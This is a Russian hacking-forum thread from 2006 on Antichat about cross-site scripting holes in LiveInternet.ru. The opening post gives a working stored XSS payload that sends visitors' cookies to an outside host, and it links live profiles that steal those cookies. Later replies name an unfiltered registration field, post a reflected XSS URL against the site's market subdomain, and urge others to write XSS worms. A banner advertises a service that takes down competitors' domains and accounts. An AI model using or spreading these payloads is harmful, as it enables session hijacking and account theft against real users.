XSS в дневнике LiveInternet.ru

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
XSS в дневнике LiveInternet.ru

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

XSS в дневнике LiveInternet.ru

13.12.2006, 12:10

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

С нами: 10358246

Репутация: 378

XSS в дневнике LiveInternet.ru

Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

𝕏 Twitter Reddit Telegram Копировать ссылку

13.12.2006, 19:30

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

С нами: 10312978

Репутация: 9

Отправить сообщение для -FARAON2005RAMSES- с помощью MSN

О! санкс! всё пашет!

13.12.2006, 19:34

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

14.12.2006, 19:23

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

С нами: 10885346

Репутация: 2947

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

14.12.2006, 20:06

†Romi4†

Постоянный

Регистрация: 06.02.2006

Сообщений: 409

С нами: 10662086

Репутация: 555

)) прикольно,лови +

15.12.2006, 02:54

~~Petr~~

Banned

Регистрация: 10.06.2006

Сообщений: 938

С нами: 10483586

Репутация: 1223

Туплю, не нашел этот пункт

Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами

Последний раз редактировалось Sandjuro; 15.12.2006 в 02:56..

22.12.2006, 16:50

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

С нами: 10312978

Репутация: 9

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

22.12.2006, 19:20

Zadoxlik

Постоянный

Регистрация: 28.02.2005

Сообщений: 853

С нами: 11156006

Репутация: 749

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

22.12.2006, 20:37

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

С нами: 10227581

Репутация: 175

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

#10

27.02.2007, 23:08

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от *D1VER

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

Это другой серв....

__________________

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Энциклопедия уязвимых скриптов	DIAgen	Веб-уязвимости	519	23.09.2021 11:44
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
XSS worms	Xex	Статьи	0	02.10.2006 01:49